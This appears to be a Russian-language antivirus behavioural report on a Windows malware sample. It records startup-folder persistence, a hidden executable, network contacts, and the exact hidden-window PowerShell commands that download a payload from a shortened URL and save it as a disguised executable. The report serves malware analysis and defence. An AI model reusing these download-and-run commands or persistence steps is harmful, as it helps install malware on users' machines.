Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\sfhdghfgh.lnk
Вредоносные функции
Загружает
- https://goo.gl/yx4i2a как (get-childitem env:\userprofile
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\sfhdghfgh.exe
Присваивает атрибут 'скрытый' для следующих файлов
- %HOMEPATH%\sfhdghfgh.exe
Сетевая активность
Подключается к
- 'dl#.#oxi.net':80
TCP
Запросы HTTP GET
- http://dl#.#oxi.net/drive/2018/10/14/0027/3642/1777210/10/00b0632ec2.txt
UDP
- DNS ASK dl#.#oxi.net
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\sfhdghfgh.exe'
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Copy-Item -Path '<Полный путь к файлу>' -destination '%HOMEPATH%\sfhdghfgh.exe' (со скрытым окном)
- '%HOMEPATH%\sfhdghfgh.exe' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadFile('https://goo.gl/YX4i2a', (Get-ChildItem env:\userprofile).value + '\mscorsvw.exe') (со скрытым окном)
